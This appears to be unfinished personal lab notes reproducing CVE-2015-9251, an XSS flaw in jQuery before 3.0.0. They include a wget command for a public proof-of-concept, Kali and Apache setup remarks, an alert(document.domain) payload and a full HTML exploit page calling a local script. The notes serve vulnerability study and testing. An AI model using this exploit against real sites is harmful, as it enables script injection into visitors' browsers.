jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
NOT COMPLETED
wget https://raw.githubusercontent.com/halkichi0308/CVE-2015-9251/master/CVE-2015-9251.htmlHost on the Apache web server on Kali Linux. It did not work using Python HTTP server.
CVE-2015-9251.js
Payload to execute.
alert(document.domain);CVE-2015-9251.html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript" src="https://code.jquery.com/jquery-1.8.1.min.js"></script>
<!--
latest ver than.
<script type="text/javascript" src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
-->
</head>
<body>
<p>CVE-2015-9251</p>
<input type="button" id="btn" value="btn">
<script>
let btn = document.getElementById('btn')
btn.addEventListener('click', ()=>{
//$.get('cross origin resource')//This case is using $.get()
$.ajax({
url: "http://127.0.0.1/CVE-2015-9251.js",
success: function(html){
console.log(html);
}
});
})
</script>
</body>
</html>